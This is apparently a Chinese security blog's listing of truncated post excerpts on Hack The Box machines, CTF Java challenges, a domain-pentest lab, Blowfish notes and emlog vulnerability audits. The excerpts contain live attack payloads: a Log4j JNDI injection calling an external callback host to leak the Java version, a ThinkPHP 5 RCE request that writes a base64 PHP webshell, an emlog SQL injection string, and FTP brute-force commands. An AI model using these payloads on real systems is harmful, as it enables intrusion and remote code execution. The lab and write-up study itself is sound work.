HTB
ps 我个人是在美国的服务器上架设代理,在vps上连接openvpn,然后使用proxifier来转发流量,liunx就用proxychains4,这样虽然比较快,但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv
拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务
Meow
nmap扫太慢了,拿fscan扫可以发现开启了23端口telnet服务,尝试登陆
1telnet 10.129.150.178
直接root登陆,未授权。
正常可以用msf来爆破
kali自带自带子在1/usr/share/wordlists/legion/
Fawn
FTP存在匿名登陆 匿名账号anonymous
使用msf的ftp login 模块设置好字典,账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt
爆破出来后可以用 ...
NSS上的一些java题
[HZNUCTF 2023 final]ezjava
打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...
春秋云镜
今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识,和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错,通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接
其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法(上)Linux提权之Sudo 70种提权方法(中)Linux提权之Sudo 7 ...
TDEA算法
简介Blowfish是由Bruce Schneier在1993年发明的对称密钥分组加密算法,类似的DES和AES都是分组加密算法,Blowfish是用来替代DES算法出现的,并且Blowfish是没有商用限制的,任何人都可以自由使用。
对比而言,虽然AES也是一种密码强度很高的对称密码算法,但是如果需要商用的话要向NIST支付授权费用
加密流程Blowfish算法流程目录
一、密钥扩展
初始化静态参数
P数组(18个元素)
S盒(4×256元素)
融合用户密钥
密钥循环填充 → 异或修改P数组
动态生成参数
加密全零块 → 更新P数组
重复加密 → 更新4个S盒
二、加密流程
拆分明文
64位分组 → 左32位(L) + 右32位(R)
16轮Feistel迭代
每轮操作:
L异或P值 → 输入F函数
R异或F结果 → 交换L/R
最终输出
末轮不交换 → 异或P[16]/P[17]
合并为64位密文
循环流程
F函数内部流程
三、核心模块
F函数
拆分4字节 ...
一条emlog的水洞
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db16f6b84918efa2c5e36af8e5ecf3d1f58e2a875b2b3f2ca38b1fb02105711657793a8ecb041b0bc58c20523744c9d9514a45e54bbe675764b0c37444af58d56bb6e0ac193849421c791a6f6e6320304b92eff76b0513b213053c50607d55b97a236c37fdfb0299c5929454bd73b212484de9e31103a448d53338f36f6fcc1176046b4b9759695d23cc5a501cc5da95c0b1ad08a26ae5cd556a50a1faeb39cf1ce9c980ef4f47d384514a3bb5fcd9ce3684edf80b4457b1c3b832cbd05f929ac7ea4160c861250ee779a66db49a8bb55758ded73b14cf97b57b ...
水的0day——emlog注册用户sql注入
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db1154dc11004e2c8e760db0814a794c499291747cb94f1010f9c6e43019d15949342ccadc356deed5c6f392b3f0bce921ea7fc848be76b590ce0247b5f6371f88884ad18eafc53058318413b487815741a05f2426be88cd701373195b78f3dafbe091a93ec1ec33ff71b74002c3347e71cfc850ed59c6c0c658090e432ad024a164e354c665a85a7194eed967e4679f810c3c931214dd614d93b888354eee44d4bb4ec2ec8e480fb6ee1f03db9c8b08775684c8091880da619b17a67683916a69f50a85ae267d444e782f55206a3e6ca0943c2bfd3fc6aa1a38 ...
emlog的1day简单审计
简单审一些前台1day吧,前台的漏洞还真不怎么好挖,水后台的漏洞又没什么意思。两个简单的sql注入,Issues上看到的 auto_excerpt=y&logcontent=123\&as_logid=1&cover=or extractvalue(0x0a,concat(0x0a,(select database())))#
java
福建农林大学攻防一队wpjustDeserialize
com.example.ezjav.utils.User下有反射调用为恶意类重写输入流将该类加入黑名单
123456789101112131415161718192021222324252627282930313233343536373839package com.example.ezjav.controller;import java.io.IOException;import java.io.InputStream;import java.io.ObjectInputStream;import java.io.ObjectStreamClass;import java.util.HashSet;import java.util.Set;*public class NewObjectInputStream extends ObjectInputStream { private static final Set<String> BLACKLISTED_CLASSES = new HashSet(); ...
铁三
123#!/bin/bashsed -i s#t3sec2025#s1eeps0rt#g /usr/local/lib/python2.7/dist-packages/bootstrap_admin_web/views.py
1